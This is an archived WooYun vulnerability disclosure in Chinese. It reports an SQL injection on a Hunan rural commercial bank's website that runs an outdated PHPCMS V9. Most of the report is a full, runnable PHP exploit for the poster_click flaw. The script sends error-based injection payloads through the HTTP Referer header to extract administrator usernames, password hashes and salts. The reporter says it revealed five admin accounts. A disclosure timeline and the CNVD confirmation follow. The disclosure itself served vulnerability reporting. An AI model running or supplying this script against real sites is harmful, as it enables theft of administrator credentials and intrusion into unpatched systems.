乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-22: 细节已通知厂商并且等待厂商处理中 2015-09-23: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
SQL注入。
湖南宜章农商行主站存在SQL注入,问题是由于系统使用了低版本的phpcmsV9...
湖南宜章农商行主站存在SQL注入,问题是由于系统使用了低版本的phpcmsV9...,于是就产生了PHPCMS V9 poster_click注入。这个问题互联网上早都公布了漏洞的详细,我就不多说了。使用大牛们写的EXP跑了下,EXP如下:
<?php/** * Created by 独自等待 * User: Hack2012 * Date: 13-2-4 下午8:25 * FileName: phpcmsv9_post_v3.php * 独自等待博客**.**.**.** */print_r('+------------------------------------------------------+ PHPCMS_V9 poster_click 注入EXP Site:http://**.**.**.**/ Exploit BY: 独自等待 Time:2013-02-19+------------------------------------------------------+');if ($argc < 3) { print_r('+------------------------------------------------------+Useage: php ' . $argv[0] . ' host pathHost: target server (ip/hostname)Path: path of phpcmsExample: php ' . $argv[0] . ' localhost /phpcms+------------------------------------------------------+ '); exit;}error_reporting(7);//统计时间$start_time = func_time();$host = $argv[1];$path = $argv[2];//取得管理员个数$cmd1 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";//echo send_pack($cmd1);if (preg_match('/MySQL Query/', send_pack($cmd1))) { //取得管理员表前缀 preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match); $tableadmin = $prefix_match[1] . '_admin'; //取得管理员个数 $cmd2 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"; preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match); $count = $num_match[1]; echo '共有' . $count . '个管理员' . "\n"; //取得管理员用户名及数据 if (preg_match('/Duplicate/', send_pack($cmd2))) { foreach (range(0, ($count - 1)) as $i) { $payload = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"; preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match); if (preg_match('/charset=utf-8/', send_pack($payload))) { echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; } else { echo $i . '-->' . $admin_match[1] . "\n"; } //echo $admin_match[1]. "\n"; //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n"; //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n"; } }} else { exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");}//提交数据包函数function send_pack($cmd){ global $host, $path; $data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n"; $data .= "Host: " . $host . "\r\n"; $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n"; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"; $data .= $cmd . "\r\n"; $data .= "Accept-Language: zh-cn\r\n"; $data .= "Connection: Close\r\n\r\n"; //这里一定要2个\r\n否则将会一直等待并且不返回数据 $fp = @fsockopen($host, 80, $errno, $errstr, 30); //echo ini_get('default_socket_timeout');//默认超时时间为60秒 if (!$fp) { echo $errno . '-->' . $errstr; exit('Could not connect to: ' . $host); } else { fwrite($fp, $data); $back = ''; while (!feof($fp)) { $back .= fread($fp, 1024); } fclose($fp); } return $back;}//时间统计函数function func_time(){ list($microsec, $sec) = explode(' ', microtime()); return $microsec + $sec;}echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';?>
结果如下,一共包含5个管理员,用户名就这样暴露了...
OK,问题证明到此。
该!
危害等级:中
漏洞Rank:10
确认时间:2015-09-23 14:46
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并下发湖南分中心,由其后续协调网站管理单位处置。
暂无